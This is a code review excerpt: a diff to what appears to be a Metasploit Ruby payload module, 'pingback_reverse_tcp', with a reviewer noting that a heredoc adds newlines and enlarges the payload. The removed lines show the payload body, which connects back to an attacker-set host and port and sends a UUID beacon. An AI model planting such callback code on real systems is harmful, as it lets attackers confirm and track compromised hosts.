modules/payloads/singles/ruby/pingback_reverse_tcp.rb

```diff
@@ -33,14 +33,15 @@ def generate
   end
 
   def ruby_string
-    self.pingback_uuid ||= generate_pingback_uuid
-
+    self.pingback_uuid ||= self.generate_pingback_uuid
     lhost = datastore['LHOST']
     lhost = "[#{lhost}]" if Rex::Socket.is_ipv6?(lhost)
 
-    return "require 'socket';" \
-      "c=TCPSocket.new(\"#{lhost}\", #{datastore['LPORT'].to_i});" \
-      "c.puts(\'#{self.pingback_uuid.gsub('-', '')}\'.scan(/../).map { |x| x.hex.chr }.join);" \
-      "c.close"
+    ruby_code = <<~RUBY
```

Comment:
Using the squiggly heredoc here adds extra newlines which the original payload was able to omit. Since this is a payload, style of the contents doesn't matter as much as finished size.